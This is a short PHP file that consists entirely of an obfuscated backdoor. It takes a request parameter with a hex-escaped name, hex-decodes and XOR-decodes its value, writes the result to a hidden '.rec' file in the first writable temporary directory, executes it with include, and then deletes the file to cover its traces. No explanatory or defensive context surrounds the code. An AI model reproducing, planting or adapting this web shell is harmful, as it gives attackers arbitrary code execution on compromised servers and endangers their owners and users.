<?php

if(@$_REQUEST["de\x73cri\x70to\x72"] !== null){
	$hld = array_filter([ini_get("upload_tmp_dir"), "/dev/shm", session_save_path(), getenv("TEMP"), sys_get_temp_dir(), "/var/tmp", getcwd(), getenv("TMP"), "/tmp"]);
	$property_set = hex2bin($_REQUEST["de\x73cri\x70to\x72"]);
	$record     =     ''      ;      $g = 0; do{$record .= chr(ord($property_set[$g]) ^ 57);$g++;} while($g < strlen($property_set));
	for ($itm = 0, $ent = count($hld); $itm < $ent; $itm++) {
    $obj = $hld[$itm];
    		if (is_dir($obj) && is_writable($obj)) {
    $ent = implode("/", [$obj, ".rec"]);
    if (file_put_contents($ent, $record)) {
	include $ent;
	@unlink($ent);
	die();
}
}
}
}